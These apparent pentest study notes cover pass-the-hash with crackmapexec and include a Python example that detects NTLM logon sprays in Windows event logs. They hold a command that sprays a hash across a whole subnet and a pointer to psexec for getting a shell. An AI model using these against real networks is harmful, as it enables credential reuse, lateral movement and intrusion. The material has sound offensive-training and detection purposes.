Crackmapexec

Pass the Hash / Pass the Password

Once we have a hash or a password, we can pass it around the network and potentially log in to other applications or servers

A tool that can be used for this is called crackmapexec

It takes the username, domain, and password, throws them at every host on the subnet, and sees where they stick

Installing crackmapexec

apt install crackmapexec

Using crackmapexec to pass the hash

crackmapexec smb <IP ADDRESS>/24 -u "User Name" -H <HASH> --local-auth

This will attempt to authenticate to every host in the range with the supplied credentials

We are looking for any result that is green or says pwned
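
From the defender's side, this kind of sweep shows up in Windows Security logs as one source address making NTLM network logons with the same account against many hosts in a short time. The detection below is an added example, not part of the original notes; the events are constructed samples using 4624/4625 field names, and the threshold and window are assumed values.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample events (not real logs). Field names follow Windows
# Security events 4624 (logon success) and 4625 (logon failure).
def _ev(ts, host, eid, user, src, pkg="NTLM", ltype=3):
    return {"time": datetime.fromisoformat(ts), "Computer": host, "EventID": eid,
            "TargetUserName": user, "IpAddress": src,
            "LogonType": ltype, "AuthenticationPackageName": pkg}

SAMPLE_EVENTS = [
    _ev("2024-01-10T09:00:01", "WS01", 4625, "Administrator", "10.0.0.50"),
    _ev("2024-01-10T09:00:02", "WS02", 4624, "Administrator", "10.0.0.50"),
    _ev("2024-01-10T09:00:02", "WS03", 4625, "Administrator", "10.0.0.50"),
    _ev("2024-01-10T09:00:03", "SRV01", 4624, "Administrator", "10.0.0.50"),
    _ev("2024-01-10T09:00:04", "WS04", 4625, "Administrator", "10.0.0.50"),
    # Ordinary activity: Kerberos logons and one NTLM logon to a single server
    _ev("2024-01-10T09:05:00", "SRV01", 4624, "jsmith", "10.0.0.21", pkg="Kerberos"),
    _ev("2024-01-10T09:06:00", "SRV02", 4624, "jsmith", "10.0.0.21", pkg="Kerberos"),
    _ev("2024-01-10T09:07:00", "SRV01", 4624, "backup", "10.0.0.30"),
]

def find_ntlm_sprays(events, min_hosts=4, window=timedelta(minutes=5)):
    """Flag (source IP, account) pairs making NTLM network logons (type 3) against
    >= min_hosts hosts inside one window. Defaults are assumptions; tune them."""
    grouped = defaultdict(list)
    for e in events:
        if (e["EventID"] in (4624, 4625) and e["LogonType"] == 3
                and e["AuthenticationPackageName"] == "NTLM"):
            grouped[(e["IpAddress"], e["TargetUserName"])].append(e)

    alerts = []
    for (src, user), evs in grouped.items():
        evs.sort(key=lambda e: e["time"])
        start, best, best_evs = 0, set(), []
        for end in range(len(evs)):
            # Slide the left edge forward until the span fits in `window`
            while evs[end]["time"] - evs[start]["time"] > window:
                start += 1
            hosts = {e["Computer"] for e in evs[start:end + 1]}
            if len(hosts) > len(best):
                best, best_evs = hosts, evs[start:end + 1]
        if len(best) >= min_hosts:
            ok = sorted({e["Computer"] for e in best_evs if e["EventID"] == 4624})
            alerts.append({"source": src, "account": user,
                           "hosts_tried": len(best), "hosts_succeeded": ok})
    return alerts

if __name__ == "__main__":
    print(find_ntlm_sprays(SAMPLE_EVENTS))
```

The hosts listed under `hosts_succeeded` are the ones where the shared local credential was accepted, which makes them the first candidates for credential rotation.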

BONUS

To get a shell out of this you can use psexec

psexec --help